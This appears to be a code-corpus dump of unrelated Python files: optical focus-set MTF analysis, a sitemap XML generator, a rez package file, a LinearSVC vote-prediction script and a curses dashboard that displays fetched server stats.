    elif not from_scratch_ and all_ps_ is not None:
        try:
            p = all_ps_[num]
            hints_needed = False
        except IndexError:
            hints_needed = True
    else:
        hints_needed = True
    # print("wfd ", wfd)
    data = lentil.constants_utils.FocusSetData()
    data.wavefront_data = wfd
    sag_ob = focusset.get_interpolation_fn_at_point(IMAGE_WIDTH / 2, IMAGE_HEIGHT / 2, AUC, SAGITTAL)
    focus_values = sag_ob.focus_data[:]
    if hints_needed:
        # Estimate the defocus step / offset hints from scratch.
        tup = focusset.find_best_focus(IMAGE_WIDTH / 2, IMAGE_HEIGHT / 2, axis=MERIDIONAL, _return_step_data_only=True,
                                       _step_estimation_posh=True)
        est_defocus_rms_wfe_step, longitude_defocus_step_um, coc_step, image_distance,\
            subject_distance, fit_peak_y, prysm_offset = tup
        data.hints['df_step'] = est_defocus_rms_wfe_step
        data.hints['df_offset'] = prysm_offset
    else:
        if p is not None:
            if 'df_step' in p:
                data.hints['df_step'] = p['df_step']
            if 'df_offset' in p:
                data.hints['df_offset'] = p['df_offset']
    # exit()
    # Locate the sharpness peak with a Cauchy fit over the AUC curve.
    mtf_means = sag_ob.sharp_data
    fitted_params = cauchy_fit(focus_values, mtf_means)
    cauchy_peak_x = fitted_params[1]
    cauchy_peak_y = fitted_params[0]
    print("Found peak {:.3f} at {:.3f}".format(cauchy_peak_y, cauchy_peak_x))
    data.cauchy_peak_x = cauchy_peak_x
    if len(wfd) == 0:
        data.hints['df_offset'] = (min(focus_values) - 2, cauchy_peak_x, max(focus_values) + 2)
    # Move on to get full frequency data
    # Find centre index
    centre_idx = int(interpolate.InterpolatedUnivariateSpline(focus_values,
                                                              range(len(focus_values)),
                                                              k=1)(cauchy_peak_x) + 0.5)
    # Window of focus slices around the peak, clipped away from the ends.
    if type(fs_slices_) is int:
        size = fs_slices_
    else:
        size = fs_slices_[num]
    slicelow = max(avoid_ends_, int(centre_idx - size * skip_ / 2 + 1))
    slicehigh = min(slicelow + size, len(mtf_means) - avoid_ends_)
    limit = (slicelow, slicehigh)
    print("Limit", limit)
    sag_data = []
    mer_data = []
    if complex_otf_:
        sagaxis = SAGITTAL_COMPLEX
        meraxis = MERIDIONAL_COMPLEX
    else:
        sagaxis = SAGITTAL
        meraxis = MERIDIONAL
    if x_loc_ is not None and y_loc_ is not None:
        x_test_loc = x_loc_
        y_test_loc = y_loc_
    else:
        x_test_loc = ob_.x_loc
        y_test_loc = ob_.y_loc
    # Gather sagittal/meridional MTF curves for every configured frequency.
    for freq in config.SPACIAL_FREQS:
        print(freq)
        sag_ob = focusset.get_interpolation_fn_at_point(x_test_loc, y_test_loc, freq, sagaxis, limit=limit, skip=skip_)
        mer_ob = focusset.get_interpolation_fn_at_point(x_test_loc, y_test_loc, freq, meraxis, limit=limit, skip=skip_)
        sag_data.append(sag_ob.sharp_data)
        mer_data.append(mer_ob.sharp_data)
    data.x_loc = x_test_loc
    data.y_loc = y_test_loc
    sag_mtf_values = np.array(sag_data)
    mer_mtf_values = np.array(mer_data)
    merged_mtf_values = (sag_mtf_values + mer_mtf_values) * 0.5
    mtf_means = np.abs(merged_mtf_values).mean(axis=0)
    focus_values = sag_ob.focus_data
    max_pos = focus_values[np.argmax(mtf_means)]
    # Rough Strehl estimates: measured means relative to the diffraction limit.
    diff_mtf = diffraction_mtf(config.SPACIAL_FREQS, focusset.exif.aperture)
    diff_mtf_mean = diff_mtf.mean()
    strehl_ests = mtf_means / diff_mtf_mean
    data.merged_mtf_values = merged_mtf_values
    data.sag_mtf_values = sag_mtf_values
    data.mer_mtf_values = mer_mtf_values
    data.mtf_means = mtf_means
    data.focus_values = focus_values
    data.max_pos = max_pos
    data.strehl_ests = strehl_ests
    if num == 0:
        data.all_ps = []
    # Normalise fit weights so they average to 1.
    weights = get_weights(merged_mtf_values.shape, focus_values, cauchy_peak_x)
    assert weights.shape == merged_mtf_values.shape
    weightmean = np.mean(weights)
    data.weights = weights / weightmean
    data.exif = focusset.exif
    if return_focusset:
        return data, focusset
    else:
        return data
def pre_process_focussets(focussets, fs_slices, skip, avoid_ends=1, from_scratch=True, x_loc=None, y_loc=None,
                          complex_otf=True):
    """Run ``_process_focusset`` over every focus set (optionally in a pool).

    Worker configuration travels through module globals installed by the
    pool ``init`` function below.  Returns ``(datas, focussets)``.
    """
    # ob = focussets[0].find_sharpest_location()
    ob = None

    def init():
        # Pool initializer: publish the configuration as module globals with
        # trailing underscores so each worker process can see it.
        global focussets_
        global fs_slices_
        global skip_
        global ob_
        global from_scratch_
        global avoid_ends_
        global x_loc_
        global y_loc_
        global complex_otf_
        global all_ps_
        focussets_ = focussets
        ob_ = ob
        skip_ = skip
        fs_slices_ = fs_slices
        from_scratch_ = from_scratch
        avoid_ends_ = avoid_ends
        x_loc_ = x_loc
        y_loc_ = y_loc
        complex_otf_ = complex_otf
        all_ps_ = all_ps

    # NOTE(review): ``all_ps`` is only assigned inside this branch, so ``init``
    # raises NameError when focussets[0] is not a path string -- confirm
    # whether callers ever pass pre-loaded FocusSet objects.
    if type(focussets[0]) is str:
        wfd = read_wavefront_data(focusset_path=focussets[0], x_loc=x_loc, y_loc=y_loc)
        try:
            dct = wfd[-1][1]
            all_ps = convert_wavefront_dicts_to_p_dicts(dct)
        except IndexError:
            all_ps = None
    if not config.DISABLE_MULTIPROCESSING:
        pool = multiprocessing.Pool(initializer=init)
        datas = pool.map(_process_focusset, range(len(focussets)))
    else:
        init()
        datas = [_process_focusset(_) for _ in range(len(focussets))]
    # Workers return (data, focusset) pairs when they loaded from a path.
    if type(focussets[0]) is str:
        datas, focussets = zip(*datas)
    # if 'all_ps' in datas[0]:
    #     for p, data in zip(datas[0].all_ps[1:], datas[1:]):
    #         data.hints = [("", p)]
    #
    # If data is old and saved before fstop data masking compensated in try_wavefront()
    #
    df_steps = [(data, data.wavefront_data[-1][1].get('p.opt:df_step')) for data in datas if 'p.opt:df_step' in data.wavefront_data[-1][1]]
    print(df_steps)
    if len(df_steps) > 1:
        data_with_steps, steps = zip(*df_steps)
        # Strictly increasing steps indicate legacy data; rescale relative to
        # the base aperture.
        if np.all(np.diff(steps) > 0):
            base_fstop = datas[0].exif.aperture
            for data, step in df_steps[1:]:
                fstop = data.exif.aperture
                data.wavefront_data[-1][1]['p.opt:df_step'] *= (base_fstop / fstop) ** 2
    return datas, focussets
def jitterstats():
    """Print jitter statistics over 20 seeded synthetic datasets.

    Prints, in order: the mean jitter error, the worst (maximum) per-dataset
    jitter error, and the mean hint jitter.
    """
    errs = 0
    max_err = 0  # renamed: the old name ``max`` shadowed the builtin
    hints = 0
    random.seed(145)
    np.random.seed(145)
    num = 20
    for _ in range(num):
        data = build_synthetic_dataset(subsets=1, test_stopdown=2, base_aperture=1.4, slices_per_fstop=19)[0]
        err = data.jittererr
        maxerr = data.jittererrmax
        hint = data.hintjit
        if maxerr > max_err:
            max_err = maxerr
        errs += err
        hints += hint
    print(errs / num)
    # BUG FIX: previously printed ``maxerr`` (the *last* iteration's value)
    # instead of the tracked maximum across all iterations.
    print(max_err)
    print(hints / num)
def plot_nominal_psf(*args, wfdd={}, x_loc=IMAGE_WIDTH/2, y_loc=IMAGE_HEIGHT/2):
    """Plot a grid of nominal PSFs: one row per parameter dict, one column
    per defocus value.

    NOTE(review): ``wfdd={}`` is a mutable default argument and appears
    unused in this body -- confirm before removing.
    """
    # plt.cla()
    # plt.close()
    disable_plot = False
    defocuses = [-2.4, 0, 2.4, 4.8]
    defocus_amount = 2
    # The literal list above is immediately replaced by a symmetric sweep.
    defocuses = np.linspace(-defocus_amount, defocus_amount, 5)
    if not disable_plot:
        f, axes = plt.subplots(len(args), len(defocuses), sharey=True, sharex=True)
        if len(args) == 1:
            axes = axes
    min_fstop = min(p['fstop'] for p in args)
    for na, dct in enumerate(args):
        df_offset = dct["df_offset"]
        for nd, defocus in enumerate(defocuses):
            # Scale defocus so stopped-down rows span a comparable range.
            alter = (dct['fstop'] / min_fstop) ** 2
            # alter = 1
            s = TestSettings(dct, defocus=defocus / alter + df_offset)
            # s.p = dict(base_fstop=1.2, fstop=1.2 * 2 ** (na / 2), df_offset=dct['df_offset'], df_step=dct['df_step'],
            #            v_scr=1, lca_slr=0, spca2=0.0)
            # s.p['v_y'] = -0.6
            # s.p['v_slr'] = 0
            s.x_loc = x_loc
            s.y_loc = y_loc
            # s.p['loca'] = 0
            # s.p['loca1'] = 0
            # s.p['spca2'] = 0
            # s.p['spca'] = 0
            # s.p['z9'] += 0.08
            # s.p['z10'] = 0
            # s.p['z11'] = 0
            # s.p['tca_slr'] = 1
            s.return_psf = True
            s.pixel_vignetting = True
            s.lens_vignetting = True
            s.phasesamples = 384
            s.fftsize = 768
            psf = generate(s).psf
            # zs = {}
            # for key, value in dct.items():
            #     if key[0].lower() == 'z' and key[1].isdigit():
            #         zs[key] = value
            #     elif key[0:7].lower() == 'p.opt:z' and key[7].isdigit():
            #         zs[key[6:]] = value
            # zs['z4'] = defocus
            # print(zs)
            # pupil = prysm.FringeZernike(**zs, norm=True, dia=10)
            # psf = prysm.PSF.from_pupil(pupil, efl=30, Q=5)
            if not disable_plot:
                if len(args) == 1:
                    ax = axes[nd]
                else:
                    ax = axes[na, nd]
                psf.plot2d(ax=ax, fig=f, axlim=defocus_amount*6)
    plt.show()
def build_normalised_scale_dictionary(gradients, ordering, target=1.0):
    """Collapse per-parameter gradients into one scale value per name.

    Each ``ordering`` entry is ``(pname, applies, _)``; the scaled value
    ``target * gradient ** 0.5`` is counted once per element of ``applies``,
    and the result is the absolute mean of those values per parameter name.
    """
    grouped = {}
    for gradient, (pname, applies, _) in zip(gradients, ordering):
        scaled = target * gradient ** 0.5
        grouped.setdefault(pname, []).extend([scaled] * len(applies))
    return {name: abs(np.array(values).mean()) for name, values in grouped.items()}
| 34.041096 | 139 | 0.599034 |
ace966dd03115efb54172fe0901f6af22031ae0a | 2,282 | py | Python | sitemap42/__init__.py | andrewp-as-is/sitemap42.py | 196fdfa8693daab7dba5aa3496af8a48daa7a691 | [
"Unlicense"
] | 1 | 2022-02-27T15:22:16.000Z | 2022-02-27T15:22:16.000Z | sitemap42/__init__.py | andrewp-as-is/sitemap42.py | 196fdfa8693daab7dba5aa3496af8a48daa7a691 | [
"Unlicense"
] | null | null | null | sitemap42/__init__.py | andrewp-as-is/sitemap42.py | 196fdfa8693daab7dba5aa3496af8a48daa7a691 | [
"Unlicense"
] | null | null | null | __all__ = ['Sitemap', 'Siteindex']
import io
import xml.dom.minidom
import xml.etree.cElementTree as etree
import xml.etree.ElementTree as ElementTree
XMLNS = "http://www.sitemaps.org/schemas/sitemap/0.9"

# Valid values for the sitemap <changefreq> element, per sitemaps.org.
CHANGEFREQ = ['always', 'hourly', 'daily', 'weekly',
              'monthly', 'yearly', 'never']


class Root:
    """Base serializer for sitemap-style XML documents.

    Subclasses set ``root_tag``/``element_tag`` (``urlset``/``url`` for a
    sitemap, ``sitemapindex``/``sitemap`` for a sitemap index).
    """

    root_tag = None
    element_tag = None

    def __init__(self, items=None):
        if not items:
            items = []
        self.items = items

    def append(self, loc, **kwargs):
        """Add one entry.

        ``loc`` is required; optional keys: ``lastmod`` (date/datetime),
        ``changefreq`` (one of CHANGEFREQ, validated at render time) and
        ``priority`` (float, rendered with one decimal place).
        """
        kwargs['loc'] = loc
        self.items.append(kwargs)

    def _to_etree(self):
        """Build and return the ElementTree for all appended items.

        Raises:
            ValueError: if an item carries an invalid ``changefreq``.
        """
        root = etree.Element(self.root_tag)
        root.attrib['xmlns'] = XMLNS
        for item in self.items:
            doc = etree.SubElement(root, self.element_tag)
            etree.SubElement(doc, 'loc').text = item['loc']
            if 'lastmod' in item:
                lastmod = item['lastmod'].strftime('%Y-%m-%d')
                etree.SubElement(doc, 'lastmod').text = lastmod
            if 'changefreq' in item:
                changefreq = item['changefreq']
                if changefreq not in CHANGEFREQ:
                    raise ValueError('invalid changefreq: %s' % changefreq)
                etree.SubElement(doc, 'changefreq').text = changefreq
            if 'priority' in item:
                etree.SubElement(
                    doc, 'priority').text = '%0.1f' % item['priority']
        tree = etree.ElementTree(root)
        return tree

    def tostring(self):
        """Return the document as a pretty-printed UTF-8 XML string."""
        tree = self._to_etree()
        with io.BytesIO() as f:
            # No declaration here: minidom adds the UTF-8 declaration below.
            tree.write(f, encoding='utf-8', xml_declaration=False)
            raw = f.getvalue()
        # BUG FIX: the old code string-replaced an XML declaration that was
        # never emitted (tree.write above is called with xml_declaration=False,
        # so the replace was dead code).  Pretty-printing via minidom supplies
        # the declaration instead.
        dom = xml.dom.minidom.parseString(raw)
        return dom.toprettyxml(encoding="utf-8").decode("utf-8")

    def write(self, filename):
        """Write the (non-pretty) document to *filename*, with declaration."""
        tree = self._to_etree()
        tree.write(filename, encoding='utf-8', xml_declaration=True)

    def __str__(self):
        return self.tostring()
class Sitemap(Root):
    """Serializer for a sitemap document (<urlset> of <url> entries)."""
    root_tag = 'urlset'
    element_tag = 'url'
class Sitemapindex(Root):
    """Serializer for a sitemap index (<sitemapindex> of <sitemap> entries)."""
    root_tag = 'sitemapindex'
    element_tag = 'sitemap'
| 31.694444 | 77 | 0.569676 |
ace967736ea5d83dc3f8be0e43f42029fbb908bd | 409 | py | Python | PythonLibraries/html5lib/0.9.9/package.py | cashmerepipeline/CashmereRez | 13a73931d715ffac27c337abcd6df97b5c47534b | [
"MIT"
] | null | null | null | PythonLibraries/html5lib/0.9.9/package.py | cashmerepipeline/CashmereRez | 13a73931d715ffac27c337abcd6df97b5c47534b | [
"MIT"
] | null | null | null | PythonLibraries/html5lib/0.9.9/package.py | cashmerepipeline/CashmereRez | 13a73931d715ffac27c337abcd6df97b5c47534b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Rez package definition for the html5lib Python library.
name = u'html5lib'

version = '0.9.9'

description = \
    """
    html5lib library
    """

requires = [ ]

variants = []

def commands():
    """Rez environment hook: prepend this package's lib dir to PYTHONPATH.

    ``getenv`` and ``env`` are globals injected by rez when this package is
    resolved; they are not defined in this file.
    """
    import os
    html5lib_libs_path = os.path.join(getenv("PYTHON_LIBS_PATH"), "html5lib", "%s"%version)
    # env.PATH.append(os.path.join(html5lib_libs_path, 'lib'))
    env.PYTHONPATH.append(os.path.join(html5lib_libs_path, 'lib'))
ace967a97b074106f8a48a56966aafd366874ff3 | 2,602 | py | Python | src/tec/ic/ia/p1/g08_svm.py | Fuabioo/Proyecto-Corto-2-3 | 44bdfd5f2774e2d0d8c8af79dc55dac340f6f4b0 | [
"MIT"
] | null | null | null | src/tec/ic/ia/p1/g08_svm.py | Fuabioo/Proyecto-Corto-2-3 | 44bdfd5f2774e2d0d8c8af79dc55dac340f6f4b0 | [
"MIT"
] | null | null | null | src/tec/ic/ia/p1/g08_svm.py | Fuabioo/Proyecto-Corto-2-3 | 44bdfd5f2774e2d0d8c8af79dc55dac340f6f4b0 | [
"MIT"
] | 1 | 2021-10-20T22:13:04.000Z | 2021-10-20T22:13:04.000Z | import numpy
import pandas
from tec.ic.ia.p1 import g08_data
from tec.ic.ia.pc1 import g08
from sklearn.svm import LinearSVC
from sklearn.svm import SVC
def non_shuffling_train_test_split(X, y, test_size=0.2):
    """Split X and y into ordered train/test partitions without shuffling.

    The first ``int((1 - test_size) * n) + 1`` rows become the training set
    and the remainder the test set, preserving sample order.
    """
    split_at = int((1 - test_size) * X.shape[0]) + 1
    return X[:split_at], X[split_at:], y[:split_at], y[split_at:]
def execute_model(dataset, test_percentage):
    """Train three LinearSVC models (one per voting round) on *dataset*.

    Args:
        dataset: raw sample rows accepted by ``g08_data.shaped_data2``.
        test_percentage: percentage of rows held out (in order) for testing.

    Returns:
        dict with decoded predictions per round ('res_1'..'res_3'), mean
        train/test accuracies ('err_train'/'err_test') and a boolean mask
        ('train_set') marking which predictions came from the training split.
    """
    def _fit_round(X, y, label_names):
        # Fit one LinearSVC on an ordered (non-shuffled) split; return the
        # decoded train+test predictions, both accuracies and the split sizes.
        x_train, x_test, y_train, y_test = non_shuffling_train_test_split(
            X, y, test_percentage / 100)
        model = LinearSVC()
        model.fit(x_train, y_train.ravel())
        labels = [label_names[int(p)] for p in model.predict(x_train)]
        labels += [label_names[int(p)] for p in model.predict(x_test)]
        train_acc = model.score(x_train, y_train.ravel())
        test_acc = model.score(x_test, y_test.ravel())
        return labels, train_acc, test_acc, len(x_train), len(x_test)

    [X1, Y1], [X2, Y2], [X3, Y3] = g08_data.shaped_data2(dataset)
    first, first_acc_train, first_acc, n_train, n_test = _fit_round(X1, Y1, g08.PARTIDOS)
    second, second_acc_train, second_acc, _, _ = _fit_round(X2, Y2, g08.PARTIDOS2)
    third, third_acc_train, third_acc, _, _ = _fit_round(X3, Y3, g08.PARTIDOS2)

    #print(first)
    print(first_acc)
    print()
    #print(second)
    print(second_acc)
    print()
    #print(third)
    print(third_acc)

    finalDict = {
        'res_1': first,
        'res_2': second,
        'res_3': third,
        # BUG FIX: train/test accuracies were swapped between these two keys.
        'err_train': (first_acc_train + second_acc_train + third_acc_train) / 3,
        'err_test': (first_acc + second_acc + third_acc) / 3,
        # BUG FIX: the mask previously was [True]*len(X1)+[False]*len(Y1)
        # (every sample counted twice); it must match the train-then-test
        # ordering of the res_* prediction lists.
        'train_set': [True] * n_train + [False] * n_test
    }
    return finalDict
execute_model(g08.generar_muestra_pais(10000,1),20) | 24.092593 | 95 | 0.708301 |
ace969438dd49c83b5f0d91b5c260e7146d1d8f5 | 10,043 | py | Python | chem/root/pysvr/chem.py | justletterh/hreqdotxyz | 6f56bb3c6f9e1a0475b5ac3995ec02c083db17e9 | [
"CC0-1.0"
] | null | null | null | chem/root/pysvr/chem.py | justletterh/hreqdotxyz | 6f56bb3c6f9e1a0475b5ac3995ec02c083db17e9 | [
"CC0-1.0"
] | null | null | null | chem/root/pysvr/chem.py | justletterh/hreqdotxyz | 6f56bb3c6f9e1a0475b5ac3995ec02c083db17e9 | [
"CC0-1.0"
] | null | null | null | import sys,os
import curses
import aiohttp
import asyncio
import json
print('loading...')
async def main():
    # Fetch the remote status JSON once at startup; the parsed payload is
    # stored in the module-level ``stats`` dict consumed by the curses pages.
    async with aiohttp.ClientSession() as session:
        # NOTE(review): hard-coded 'auth' header value committed to source --
        # confirm this is a placeholder and not a live credential.
        async with session.get('http://167.99.100.83:8080/status', headers={'auth': 'PASSWORD'}) as resp:
            global stats
            txt = await resp.text()
            stats = json.loads(txt)

asyncio.run(main())

# Shorthand views into sections of the fetched stats payload.
psys = stats['sys']
ppc = psys['sys']
pcpu = psys['cpu']
pmem = psys['mem']
pswp = psys['mem']['swap']
pnet = psys['net']
pio = psys['io']
ppy = stats['py']
pover = stats['other-versions']
def strfix(str, tabin=1, prelen=0):
    """Indent the continuation lines of a multi-line string.

    Args:
        str: the text whose embedded newlines get padded.  (The parameter
            name shadows the builtin ``str`` but is kept for backward
            compatibility with existing callers.)
        tabin: number of 4-space tabs of indentation.
        prelen: extra columns of indentation (e.g. the width of a label
            printed before the value).

    Returns:
        The text with every newline followed by the computed padding.
    """
    text = str  # alias so the shadowed builtin name is not used below
    pad = "\n" + " " * (tabin * 4 + prelen)
    return text.replace("\n", pad)
def draw_menu2(stdscr):
    """Second stats page: 'other versions' listing (curses event loop).

    Reads the module-level ``pover`` dict; 'q' quits, 'l'/'p' return to the
    first page via ``main()``.
    """
    k = 0
    cursor_x = 0
    cursor_y = 0
    stdscr.clear()
    stdscr.refresh()
    # Colour pairs shared with draw_menu: 1=values, 2=labels, 3=status bar,
    # 4=title banner.
    curses.start_color()
    curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
    curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
    curses.init_pair(3, curses.COLOR_BLACK, curses.COLOR_WHITE)
    curses.init_pair(4, curses.COLOR_RED, curses.COLOR_WHITE)
    while (k != ord('q')):
        if k == ord('l'):
            main()
            return
        if k == ord('p'):
            main()
            return
        stdscr.clear()
        height, width = stdscr.getmaxyx()
        # Arrow keys move the cursor, clamped to the window bounds below.
        if k == curses.KEY_DOWN:
            cursor_y = cursor_y + 1
        elif k == curses.KEY_UP:
            cursor_y = cursor_y - 1
        elif k == curses.KEY_RIGHT:
            cursor_x = cursor_x + 1
        elif k == curses.KEY_LEFT:
            cursor_x = cursor_x - 1
        cursor_x = max(0, cursor_x)
        cursor_x = min(width-1, cursor_x)
        cursor_y = max(0, cursor_y)
        cursor_y = min(height-1, cursor_y)
        title = "stats"[:width-1]
        subtitle = "as of rn"[:width-1]
        keystr = "Last key pressed: {}".format(k)[:width-1]
        statusbarstr = "Press 'q' to exit and 'l' or 'p' to go to the previous page | Pos: {}, {}".format(cursor_x, cursor_y)
        if k == 0:
            keystr = "No key press detected..."[:width-1]
        start_x_title = int((width // 2) - (len(title) // 2) - len(title) % 2)
        start_x_subtitle = int((width // 2) - (len(subtitle) // 2) - len(subtitle) % 2)
        start_x_keystr = int((width // 2) - (len(keystr) // 2) - len(keystr) % 2)
        start_y = int((height // 2) - 2)
        tab = 4
        htab = 2
        # Paint an invisible-separator character (U+2063) down column 20.
        count = 0
        cond = True
        while cond:
            count = count + 1
            stdscr.addstr(count, 20, '\u2063')
            if count == height-2:
                cond = False
        # Bold red labels.
        stdscr.attron(curses.color_pair(2))
        stdscr.attron(curses.A_UNDERLINE)
        stdscr.attron(curses.A_BOLD)
        stdscr.addstr(1, 0, 'other versions: ')
        stdscr.attroff(curses.A_UNDERLINE)
        stdscr.addstr(2, tab*1, 'nginx: ')
        stdscr.addstr(3, tab*1, 'apt: ')
        stdscr.addstr(4, tab*1, 'nano: ')
        stdscr.attroff(curses.A_BOLD)
        stdscr.attroff(curses.color_pair(2))
        # Cyan values, indented past their labels via strfix.
        stdscr.attron(curses.color_pair(1))
        stdscr.addstr(2, 7+tab*1, strfix(f'{pover["nginx"]}', 1, 7))
        stdscr.addstr(3, 5+tab*1, strfix(f'{pover["apt"]}', 1, 5))
        stdscr.addstr(4, 6+tab*1, strfix(f'{pover["nano"]}', 1, 6))
        stdscr.attroff(curses.color_pair(1))
        # Centred title banner across the top row.
        name = 'STATS'
        stdscr.attron(curses.color_pair(4))
        stdscr.attron(curses.A_BOLD)
        stdscr.addstr(0, start_x_title, name)
        stdscr.addstr(0,0, ' '*start_x_title)
        stdscr.addstr(0, len(name)+start_x_title, " " * (width - len(name) - 1-start_x_title))
        stdscr.attroff(curses.A_BOLD)
        stdscr.attroff(curses.color_pair(4))
        # Status bar on the bottom row.
        stdscr.attron(curses.color_pair(3))
        stdscr.addstr(height-1, 0, statusbarstr)
        stdscr.addstr(height-1, len(statusbarstr), " " * (width - len(statusbarstr) - 1))
        stdscr.attroff(curses.color_pair(3))
        stdscr.move(cursor_y, cursor_x)
        stdscr.refresh()
        k = stdscr.getch()
def draw_menu(stdscr):
    """First stats page: system/cpu/memory/network/python info (curses loop).

    Reads the module-level ``ppc``/``pcpu``/``pmem``/``pswp``/``pnet``/
    ``pio``/``ppy`` dicts; 'q' quits, 'n' switches to the second page.
    """
    k = 0
    cursor_x = 0
    cursor_y = 0
    stdscr.clear()
    stdscr.refresh()
    # Colour pairs: 1=values, 2=labels, 3=status bar, 4=title banner.
    curses.start_color()
    curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
    curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
    curses.init_pair(3, curses.COLOR_BLACK, curses.COLOR_WHITE)
    curses.init_pair(4, curses.COLOR_RED, curses.COLOR_WHITE)
    while (k != ord('q')):
        if k == ord('n'):
            main2()
            return
        stdscr.clear()
        height, width = stdscr.getmaxyx()
        # Arrow keys move the cursor, clamped to the window bounds below.
        if k == curses.KEY_DOWN:
            cursor_y = cursor_y + 1
        elif k == curses.KEY_UP:
            cursor_y = cursor_y - 1
        elif k == curses.KEY_RIGHT:
            cursor_x = cursor_x + 1
        elif k == curses.KEY_LEFT:
            cursor_x = cursor_x - 1
        cursor_x = max(0, cursor_x)
        cursor_x = min(width-1, cursor_x)
        cursor_y = max(0, cursor_y)
        cursor_y = min(height-1, cursor_y)
        title = "stats"[:width-1]
        subtitle = "as of rn"[:width-1]
        keystr = "Last key pressed: {}".format(k)[:width-1]
        statusbarstr = "Press 'q' to exit and 'n' to go to the next page | Pos: {}, {}".format(cursor_x, cursor_y)
        if k == 0:
            keystr = "No key press detected..."[:width-1]
        start_x_title = int((width // 2) - (len(title) // 2) - len(title) % 2)
        start_x_subtitle = int((width // 2) - (len(subtitle) // 2) - len(subtitle) % 2)
        start_x_keystr = int((width // 2) - (len(keystr) // 2) - len(keystr) % 2)
        start_y = int((height // 2) - 2)
        tab = 4
        htab = 2
        # Paint an invisible-separator character (U+2063) down column 20.
        count = 0
        cond = True
        while cond:
            count = count + 1
            stdscr.addstr(count, 20, '\u2063')
            if count == height-2:
                cond = False
        # Bold red section headers (underlined) and field labels.
        stdscr.attron(curses.color_pair(2))
        stdscr.attron(curses.A_UNDERLINE)
        stdscr.attron(curses.A_BOLD)
        stdscr.addstr(1, 0, 'system:')
        stdscr.addstr(2, tab*1, 'computer:')
        stdscr.addstr(9, tab*1, 'cpu:')
        stdscr.addstr(14, tab*1, 'memory:')
        stdscr.addstr(19, tab*2, 'swap:')
        stdscr.addstr(24, tab*1, 'network:')
        stdscr.addstr(29, tab*1, 'input/output:')
        stdscr.addstr(32, 0, 'python:')
        stdscr.attroff(curses.A_UNDERLINE)
        stdscr.addstr(3, tab*2, 'os: ')
        stdscr.addstr(4, tab*2, 'name: ')
        stdscr.addstr(5, tab*2, 'os release: ')
        stdscr.addstr(6, tab*2, 'os version: ')
        stdscr.addstr(7, tab*2, 'architecture: ')
        stdscr.addstr(8, tab*2, 'boot time: ')
        stdscr.addstr(10, tab*2, 'current frequency: ')
        stdscr.addstr(11, tab*2, 'physical cores: ')
        stdscr.addstr(12, tab*2, 'total cores: ')
        stdscr.addstr(13, tab*2, 'usage: ')
        stdscr.addstr(15, tab*2, 'total: ')
        stdscr.addstr(16, tab*2, 'avaliable: ')
        stdscr.addstr(17, tab*2, 'used: ')
        stdscr.addstr(18, tab*2, 'percent free: ')
        stdscr.addstr(20, tab*3, 'total: ')
        stdscr.addstr(21, tab*3, 'free: ')
        stdscr.addstr(22, tab*3, 'used: ')
        stdscr.addstr(23, tab*3, 'percent used: ')
        stdscr.addstr(25, tab*2, 'interface name: ')
        stdscr.addstr(26, tab*2, 'ip: ')
        stdscr.addstr(27, tab*2, 'netmask: ')
        stdscr.addstr(28, tab*2, 'broadcast ip: ')
        stdscr.addstr(30, tab*2, 'sent: ')
        stdscr.addstr(31, tab*2, 'received: ')
        stdscr.addstr(33, tab*1, 'version: ')
        stdscr.addstr(35, tab*1, 'version info: ')
        stdscr.attroff(curses.A_BOLD)
        stdscr.attroff(curses.color_pair(2))
        # Cyan values; the column offset is each label's width plus its indent.
        stdscr.attron(curses.color_pair(1))
        stdscr.addstr(3, 4+tab*2, f'{ppc["os"]}')
        stdscr.addstr(4, 6+tab*2, f'{ppc["node"]}')
        stdscr.addstr(5, 12+tab*2, f'{ppc["release"]}')
        stdscr.addstr(6, 12+tab*2, f'{ppc["ver"]}')
        stdscr.addstr(7, 14+tab*2, f'{ppc["arch"]}')
        stdscr.addstr(8, 11+tab*2, f'{ppc["start"]}')
        stdscr.addstr(10, 19+tab*2, f'{pcpu["curfreq"]}')
        stdscr.addstr(11, 16+tab*2, f'{pcpu["phys"]}')
        stdscr.addstr(12, 13+tab*2, f'{pcpu["total"]}')
        stdscr.addstr(13, 7+tab*2, f'{pcpu["use"]}')
        stdscr.addstr(15, 7+tab*2, f'{pmem["total"]}')
        stdscr.addstr(16, 11+tab*2, f'{pmem["avaliable"]}')
        stdscr.addstr(17, 6+tab*2, f'{pmem["used"]}')
        stdscr.addstr(18, 14+tab*2, f'{pmem["percnt"]}')
        stdscr.addstr(20, 7+tab*3, f'{pswp["total"]}')
        stdscr.addstr(21, 6+tab*3, f'{pswp["free"]}')
        stdscr.addstr(22, 6+tab*3, f'{pswp["used"]}')
        stdscr.addstr(23, 14+tab*3, f'{pswp["percnt"]}')
        stdscr.addstr(25, 16+tab*2, f'{pnet["name"]}')
        stdscr.addstr(26, 4+tab*2, f'{pnet["ip"]}')
        stdscr.addstr(27, 9+tab*2, f'{pnet["mask"]}')
        stdscr.addstr(28, 14+tab*2, f'{pnet["bip"]}')
        stdscr.addstr(30, 6+tab*2, f'{pio["sent"]}')
        stdscr.addstr(31, 10+tab*2, f'{pio["rcved"]}')
        stdscr.addstr(33, 9+tab*1, strfix(f'{ppy["ver"]}', 1, 9))
        stdscr.addstr(35, 14+tab*1, f'{ppy["verinf"]}')
        stdscr.attroff(curses.color_pair(1))
        # Centred title banner across the top row.
        name = 'STATS'
        stdscr.attron(curses.color_pair(4))
        stdscr.attron(curses.A_BOLD)
        stdscr.addstr(0, start_x_title, name)
        stdscr.addstr(0,0, ' '*start_x_title)
        stdscr.addstr(0, len(name)+start_x_title, " " * (width - len(name) - 1-start_x_title))
        stdscr.attroff(curses.A_BOLD)
        stdscr.attroff(curses.color_pair(4))
        # Status bar on the bottom row.
        stdscr.attron(curses.color_pair(3))
        stdscr.addstr(height-1, 0, statusbarstr)
        stdscr.addstr(height-1, len(statusbarstr), " " * (width - len(statusbarstr) - 1))
        stdscr.attroff(curses.color_pair(3))
        stdscr.move(cursor_y, cursor_x)
        stdscr.refresh()
        k = stdscr.getch()
def main():
    # Launch page one inside curses.wrapper (restores the terminal on exit).
    # NOTE(review): this redefines the module's earlier ``async def main`` --
    # intentional-looking (the async one has already run), but confirm.
    curses.wrapper(draw_menu)

def main2():
    # Launch the second stats page ('other versions').
    curses.wrapper(draw_menu2)

if __name__ == "__main__":
    main()
